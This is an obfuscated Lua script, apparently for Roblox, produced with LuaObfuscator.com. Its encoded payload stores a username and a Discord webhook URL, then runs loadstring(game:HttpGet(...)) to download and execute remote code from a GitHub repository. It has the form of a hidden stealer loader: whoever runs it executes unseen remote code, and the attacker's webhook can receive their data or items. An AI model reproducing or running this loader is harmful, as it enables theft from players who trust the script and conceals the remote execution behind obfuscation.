--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;return (v33 * 256) + v32 ;end v18=3;end if (v18==4) then function v25()local v34=v24();local v35=v24();local v36=1 + 0 ;local v37=(v21(v35,1 -0 ,51 -31 ) * ((621 -(555 + 64))^(963 -(857 + 74)))) + v34 ;local v38=v21(v35,(1546 -(892 + 65)) -(367 + 201) ,958 -(214 + 713) );local v39=((v21(v35,9 + 23 )==1) and  -1) or (1 + 0) ;if (v38==(877 -(282 + 595))) then if (v37==(1637 -((3633 -2110) + 114))) then return v39 * (0 + (0 -0)) ;else v38=1;v36=0 -0 ;end elseif (v38==2047) then return ((v37==(1065 -(68 + 997))) and (v39 * ((1271 -(226 + 1044))/(0 -0)))) or (v39 * NaN) ;end return v8(v39,v38-1023 ) * (v36 + (v37/((119 -(32 + 85))^(51 + 1)))) ;end v26=nil;function v26(v40)local v41;if  not v40 then local v69=0 -0 ;while true do if ((350 -(87 + 263))==v69) then v40=v24();if (v40==(180 -(67 + 113))) then return "";end break;end end end v41=v3(v16,v19,(v19 + v40) -(1 + 0 + 0) );v19=v19 + v40 ;local v42={};for v67=2 -1 , #v41 do v42[v67]=v2(v1(v3(v41,v67,v67)));end return v6(v42);end v18=5;end if (v18==6) then v29=nil;function v29()local v43=0 + 0 ;local v44;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v43==(1770 -(1749 + 20))) then v46=nil;v47=nil;v43=1 + 1 ;end if (v43==(1 + 1)) then local v73=0 -0 ;while true do if (v73==1) then v43=1148 -(466 + 679) ;break;end if (v73~=(0 -0)) then else v48=nil;v49=nil;v73=1;end end end if (v43==(8 -5)) then v50=nil;while true do local v78=1900 -(106 + 1794) ;while true do if (v78==(0 + 0)) then if (v44==(3 -2)) then v48={v45,v46,nil,v47};v49=v24();v50={};v44=586 -(57 + 527) ;end if (v44~=(1427 -(41 + 1386))) then else local v103=103 -(17 + 86) ;local v104;while true do if ((0 -0)~=v103) then else v104=0;while true do if ((1 -0)~=v104) then else v47={};v44=699 -(208 + 490) ;break;end if (v104~=(0 + 0)) then else local v124=0 + 0 ;while true do if (v124~=0) then else v45={};v46={};v124=837 -(660 + 176) ;end if (v124==1) then v104=1 + 0 ;break;end end end end break;end end end v78=167 -(122 + 44) ;end if (v78==1) then if (v44==(5 -2)) then local v105=0;while true do if (v105~=(202 -(14 + 188))) then else local v107=675 -(534 + 141) ;while true do if (v107==(0 + 0)) then for v125=1 + 0 ,v24() do v46[v125-(1 + 0) ]=v29();end return v48;end end end end end if (v44~=(2 + 0)) then else local v106=65 -(30 + 35) ;while true do if (v106==0) then for v109=1,v49 do local v110=0 -0 ;local v111;local v112;local v113;while true do if (v110~=(1 -0)) then else v113=nil;while true do if (v111~=0) then else v112=v22();v113=nil;v111=1 + 0 ;end if (v111~=(2 -1)) then else if (v112==(3 -2)) then v113=v22()~=(0 + 0) ;elseif (v112==(5 -3)) then v113=v25();elseif (v112==(2 + 1)) then v113=v26();end v50[v109]=v113;break;end end break;end if (v110~=(396 -(115 + 281))) then else local v127=0;while true do if (0==v127) then v111=0;v112=nil;v127=2 -1 ;end if (v127~=(1 + 0)) then else v110=1;break;end end end end end v48[3]=v22();v106=2 -1 ;end if (v106==(3 -2)) then for v114=868 -(550 + 317) ,v24() do local v115=320 -(53 + 267) ;local v116;local v117;local v118;while true do if (v115==(0 -0)) then local v128=0;while true do if (0==v128) then v116=0 -0 ;v117=nil;v128=2 -1 ;end if (v128==1) then v115=286 -(134 + 151) ;break;end end end if (v115~=(3 -2)) then else v118=nil;while true do if (0==v116) then local v177=0;while true do if (v177~=(0 + 0)) then else local v187=1665 -(970 + 695) ;while true do if (v187~=(1 -0)) then else v177=1991 -(582 + 1408) ;break;end if (v187~=0) then else v117=0;v118=nil;v187=3 -2 ;end end end if (v177==(1 -0)) then v116=1;break;end end end if (v116==(3 -2)) then while true do if (v117==0) then v118=v22();if (v21(v118,1 + 0 ,1825 -(1195 + 629) )==(0 -0)) then local v188=0 + 0 ;local v189;local v190;local v191;local v192;local v193;while true do if (v188==(1 + 0)) then v191=nil;v192=nil;v188=2 -0 ;end if (v188==(243 -(187 + 54))) then v193=nil;while true do if (v189==2) then while true do if ((780 -(162 + 618))==v190) then local v196=0 + 0 ;local v197;while true do if (v196==(0 + 0)) then v197=1551 -(1126 + 425) ;while true do if (v197~=1) then else v190=1 -0 ;break;end if (v197~=(0 -0)) then else local v206=0;local v207;while true do if (v206==(405 -(118 + 287))) then v207=0 -0 ;while true do if (v207~=0) then else v191=v21(v118,1 + 1 ,8 -5 );v192=v21(v118,1640 -(1373 + 263) ,383 -(142 + 235) );v207=4 -3 ;end if ((1 + 0)==v207) then v197=1001 -(451 + 549) ;break;end end break;end end end end break;end end end if ((1 + 1)==v190) then local v198=977 -(553 + 424) ;local v199;while true do if (v198==(0 -0)) then v199=0 + 0 ;while true do if (v199==0) then local v208=0 + 0 ;while true do if (v208~=(0 -0)) then else local v209=0 + 0 ;while true do if ((1 -0)~=v209) then else v208=1385 -(746 + 638) ;break;end if ((0 + 0)~=v209) then else if (v21(v192,1,1 + 0 )==(1 -0)) then v193[343 -(218 + 123) ]=v50[v193[1583 -(1535 + 46) ]];end if (v21(v192,1 + 1 ,9 -7 )==(1 + 0)) then v193[3]=v50[v193[3]];end v209=1 + 0 ;end end end if (v208~=(1330 -(797 + 532))) then else v199=1 + 0 ;break;end end end if (v199~=(1 + 0)) then else v190=3;break;end end break;end end end if (v190==3) then if (v21(v192,1 + 2 ,563 -(306 + 254) )==(1203 -(373 + 829))) then v193[1 + 3 ]=v50[v193[1134 -(369 + 761) ]];end v45[v114]=v193;break;end if (v190==(1 + 0)) then local v201=0 -0 ;local v202;local v203;while true do if (v201~=(1467 -(899 + 568))) then else v202=0 + 0 ;v203=nil;v201=1;end if (v201==1) then while true do if (v202~=0) then else v203=0 -0 ;while true do if ((603 -(268 + 335))==v203) then v193={v23(),v23(),nil,nil};if (v191==(336 -(144 + 192))) then local v210=216 -(42 + 174) ;local v211;while true do if (v210==0) then v211=1456 -(282 + 1174) ;while true do if (v211==0) then v193[3 + 0 ]=v23();v193[4]=v23();break;end end break;end end elseif (v191==1) then v193[3]=v24();elseif (v191==(813 -(569 + 242))) then v193[8 -5 ]=v24() -(2^(1 + 15)) ;elseif (v191~=(1507 -(363 + 1141))) then else local v220=1024 -(706 + 318) ;local v221;while true do if (v220~=(1251 -(721 + 530))) then else v221=0;while true do if (v221==(0 + 0)) then v193[3]=v24() -((1273 -(945 + 326))^(1991 -(1913 + 62))) ;v193[4]=v23();break;end end break;end end end v203=1;end if ((2 -1)~=v203) then else v190=2;break;end end break;end end break;end end end end break;end if (v189~=(2 -1)) then else local v194=0;while true do if (v194==(1934 -(565 + 1368))) then v189=2 + 0 ;break;end if ((0 -0)~=v194) then else v192=nil;v193=nil;v194=1662 -(1477 + 184) ;end end end if (v189~=(0 -0)) then else local v195=700 -(271 + 429) ;while true do if (v195==(1 + 0)) then v189=1501 -(1408 + 92) ;break;end if (v195==(1086 -(461 + 625))) then v190=0 -0 ;v191=nil;v195=2 -1 ;end end end end break;end if (v188==(1288 -(993 + 295))) then v189=0 + 0 ;v190=nil;v188=1172 -(418 + 753) ;end end end break;end end break;end end break;end end end v44=2 + 1 ;break;end end end break;end end end break;end if (v43==(0 + 0)) then local v74=0 + 0 ;while true do if ((1 + 0)==v74) then v43=1;break;end if (v74~=(529 -(406 + 123))) then else v44=476 -(41 + 435) ;v45=nil;v74=1002 -(938 + 63) ;end end end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v51)if (v1(v51,2)==79) then v20=v0(v3(v51,1,1));return "";else local v70=v2(v0(v51,16));if v20 then local v79=0;local v80;while true do if (v79==1) then return v80;end if (v79==0) then v80=v5(v70,v20);v20=nil;v79=1;end end else return v70;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v52=0 + 0 ;local v53;local v54;local v55;local v56;while true do if (v52==(1125 -(936 + 189))) then v53,v54,v55,v56=v1(v16,v19,v19 + 1 + 2 );v19=v19 + (1617 -(1565 + 48)) ;v52=1 + 0 ;end if (v52==(1139 -(782 + 356))) then return (v56 * (16777483 -(176 + 91))) + (v55 * (170742 -(106298 -(975 + 117)))) + (v54 * (376 -120)) + v53 ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v57,v58,v59)local v60=0;local v61;local v62;local v63;while true do if (v60==0) then v61=v57[1];v62=v57[2];v60=1;end if (v60==1) then v63=v57[3];return function(...)local v81=v61;local v82=v62;local v83=v63;local v84=v28;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do local v96=0;while true do if (v96==1) then if (v94<=5) then if (v94<=2) then if (v94<=0) then v91[v93[2]]=v59[v93[3]];elseif (v94>1) then local v129;local v130,v131;local v132;local v133;v59[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v59[v93[3]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v59[v93[3]];v85=v85 + 1 ;v93=v81[v85];v133=v93[2];v132=v91[v93[3]];v91[v133 + 1 ]=v132;v91[v133]=v132[v93[4]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3]~=0 ;v85=v85 + 1 ;v93=v81[v85];v133=v93[2];v130,v131=v84(v91[v133](v13(v91,v133 + 1 ,v93[3])));v86=(v131 + v133) -1 ;v129=0;for v157=v133,v86 do v129=v129 + 1 ;v91[v157]=v130[v129];end v85=v85 + 1 ;v93=v81[v85];v133=v93[2];v91[v133]=v91[v133](v13(v91,v133 + 1 ,v86));v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]();v85=v85 + 1 ;v93=v81[v85];v85=v93[3];else do return;end end elseif (v94<=3) then local v121=0;local v122;while true do if (v121==0) then v122=v93[2];v91[v122]=v91[v122](v13(v91,v122 + 1 ,v86));break;end end elseif (v94>4) then local v143=0;local v144;local v145;local v146;local v147;while true do if (v143==1) then v86=(v146 + v144) -1 ;v147=0;v143=2;end if (v143==0) then v144=v93[2];v145,v146=v84(v91[v144](v13(v91,v144 + 1 ,v93[3])));v143=1;end if (v143==2) then for v184=v144,v86 do v147=v147 + 1 ;v91[v184]=v145[v147];end break;end end else v91[v93[2]]=v93[3];end elseif (v94<=8) then if (v94<=6) then local v123=0;while true do if (v123==4) then v85=v93[3];break;end if (v123==2) then v59[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v123=3;end if (0==v123) then v59[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v123=1;end if (v123==1) then v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v123=2;end if (v123==3) then v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v123=4;end end elseif (v94>7) then v59[v93[3]]=v91[v93[2]];else v91[v93[2]]=v93[3]~=0 ;end elseif (v94<=10) then if (v94>9) then v91[v93[2]]();elseif (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif (v94==11) then local v153=0;local v154;local v155;while true do if (v153==1) then v91[v154 + 1 ]=v155;v91[v154]=v155[v93[4]];break;end if (v153==0) then v154=v93[2];v155=v91[v93[3]];v153=1;end end else v85=v93[3];end v85=v85 + 1 ;break;end if (v96==0) then v93=v81[v85];v94=v93[1];v96=1;end end end end;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v64,v65,v66)if v66 then local v71=(v64/(((2824 -(245 + 702)) -(157 + 1718))^(v65-(1 + (0 -0)))))%((1 + 1)^(((v66-(3 -2)) -(v65-(3 -2))) + 1)) ;return v71-(v71%(1019 -(697 + 321))) ;else local v72=(613 -(602 + 3 + 6))^(v65-(1190 -((2347 -(260 + 1638)) + 740))) ;return (((v64%(v72 + v72))>=v72) and (2 -(441 -(382 + 58)))) or (0 -0) ;end end v22=nil;v18=2;end end end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030E3O0049616D7468656265737438373336030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403403O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4153544F52534352495054532F4153544F52322F6D61696E2F4153544F5203083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3135313237314O3437393735342O33302F5A493568516E66486864654F542D445538503778506F6A72307975715A76387235626E787A574C594A6D702O434A7A446F56366B6841396F6876716A7052756E5064424900173O0012043O00013O0026093O000E0001000200040C3O000E0001001204000100043O001202000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O001600010026093O00010001000100040C3O00010001001204000100043O001206000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00013O00017O00",v9(),...);
